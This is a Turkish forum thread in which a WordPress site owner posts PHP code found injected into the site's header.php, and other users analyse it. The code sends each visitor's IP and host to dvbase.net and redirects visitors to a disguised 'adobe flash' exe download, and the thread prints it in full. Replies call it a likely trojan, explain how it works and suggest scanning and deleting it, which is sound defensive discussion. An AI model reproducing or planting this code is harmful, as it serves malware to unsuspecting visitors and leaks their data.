Header.Php De Bulduğum Gizli Kod

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    PoLiZei
    PoLiZei's avatar
    Kayıt Tarihi: 03/Eylül/2005
    Erkek
    hocalar bu kodu wordpress sitemin header.php içerisinde buldum siteye girdiğimde adobe+flash.exe diye bi dosya indiriyordu shell mi yemişim ne iş nedir bu kod anlayan müridler bi baksın

     

     

    <?php
    
      // chosen subaccount
    
      define('SUB_ID', '2550');
    
      
    
      // your private secure key
    
      define('SECURE_KEY', '62fc4df0bfc6fbd7f30965a856bf2289da4f6616');
    
    
    
      $sQuery = 'http://dvbase.net/fdownload/'
    
        // subaccount ID !!!required!!!
    
        .'?id='. SUB_ID
    
        // private secure key !!!required!!!
    
        .'&key='. SECURE_KEY
    
        .'&xml'
    
        .'&ip='. urlencode($_SERVER['REMOTE_ADDR'])
    
        // those parameters are required to keep statistics
    
        .'&host='. urlencode($_SERVER['HTTP_HOST'])
    
        // name of torrent, also search request in case of unavailability of torrent !!!required!!!
    
        .'&name='. urlencode("adobe flash");
    
    
    
        $sQuery .= '&direct='. urlencode("http://www.oyunblog.org/adobe.exe"); // direct link to file
    
    
    
      $fileXML = simplexml_load_file($sQuery);
    
    
    
      if(empty($fileXML) || empty($fileXML->url)){
    
        // handling errors
    
      }
    
      else{
    
        // redirect to download exe
    
        header('Location: '. urldecode($fileXML->url));
    
      }
    
    ?>
     
     
     
     

    Hayat paylasmaktır
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    interfector
    interfector's avatar
    Kayıt Tarihi: 14/Haziran/2011
    Homo

    büyük ihtimalle truva atı felandır hocam. kaspersky yükle ve tarat.


    Aldanma insanların samimiyetine, menfaatleri için gelirler vecde, vaad etmeseydi allah cenneti, ona bile etmezlerdi secde..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Kayıt Tarihi: 13/Ekim/2007
    Erkek

    Dosyayı indir çalıştırmadan yolla bakalım virusscan sitelerine ... 

    Koduda cosmic yorumlarsa daha net birşey diyebilir . 


    Tbt Dersimliler Derneği Başkanı :)
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    shock56
    shock56's avatar
    Kayıt Tarihi: 31/Mart/2007
    Erkek

    http://dvbase.net/fdownload/ sitesine get ile ip adresini ve host adını gönderiyor. bu bilgileri büyük ihtimalle kayıt altına alıyordur. Daha sonra şöyle bir xml sayfasına yönlendiriyor. .http://dvbase.net/fdownload/?id=2550

    gelen name değişkenine göre burda exe uzantılı yeni bir link oluşturuyor.

    Son olarak sayfayı bu exe uzantılı linke yönlendiriyor.

    işin içinde .exe varsa sikinti olabilir :)

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    anarsistherif
    anarsistherif's avatar
    Kayıt Tarihi: 27/Ağustos/2009
    Erkek

    trojandir abi ne olacak. header.php'den flash player mi iner. 


    =)
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    snnyk
    snnyk's avatar
    Kayıt Tarihi: 28/Mayıs/2007
    Erkek

    gizli felan değil hocam adam açık açık yazmış 

    açıklama bile yazmış hatta

    istediğinin true dönmesi sonucu bişey indirtiyo 

    ne sitesiki bu ? 


    snnyk.com - code is poetry all that i know...
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    PoLiZei
    PoLiZei's avatar
    Kayıt Tarihi: 03/Eylül/2005
    Erkek

    hacılar comodo var bende bulamadı dosyada bişey online viruscanlarda denicem birde


    Hayat paylasmaktır
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    PoLiZei
    PoLiZei's avatar
    Kayıt Tarihi: 03/Eylül/2005
    Erkek

    snnyk bunu yazdı:
    -----------------------------

    gizli felan değil hocam adam açık açık yazmış 

    açıklama bile yazmış hatta

    istediğinin true dönmesi sonucu bişey indirtiyo 

    ne sitesiki bu ? 


    -----------------------------

     

     

    oyun sitesi hocam oyun tanıtımları yapılıyor


    Hayat paylasmaktır
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    snnyk
    snnyk's avatar
    Kayıt Tarihi: 28/Mayıs/2007
    Erkek

    sil gitsin


    snnyk.com - code is poetry all that i know...
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    shock56
    shock56's avatar
    Kayıt Tarihi: 31/Mart/2007
    Erkek

    PoLiZei bunu yazdı:
    -----------------------------

    snnyk bunu yazdı:
    -----------------------------

    gizli felan değil hocam adam açık açık yazmış 

    açıklama bile yazmış hatta

    istediğinin true dönmesi sonucu bişey indirtiyo 

    ne sitesiki bu ? 


    -----------------------------

     

     

    oyun sitesi hocam oyun tanıtımları yapılıyor


    -----------------------------

    Yönlendirdiği site oyun sitesi değil. Yönlendirdiği site http://dvbase.net/fdownload/?id=2550 .... düzeltme ( yönlendirdiği site http://install.downvision.com  ama o da pek sağlam ayak değil bakınız : http://urlquery.net/report.php?id=70781 )

    urlQuery.net den url analizi yaptığımızda pek de sağlıklı bir hosting de olmadığını söyleyebiliriz

    işte sorgu sonucu

    http://urlquery.net/report.php?id=70761

    host grubu pek sağlıklı değil

    Büyük ihtimalle shell 

    bakınız shell nedir : http://www.turkhackteam.net/web-server-guvenligi/700601-shell-nedir-nasil-atilir.html


  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pcdoktor636
    pcdoktor636's avatar
    Kayıt Tarihi: 12/Ocak/2010
    Erkek

    link silinmiş adobe.exe'ye bakamadım ama trojandır.

Toplam Hit: 2781 Toplam Mesaj: 14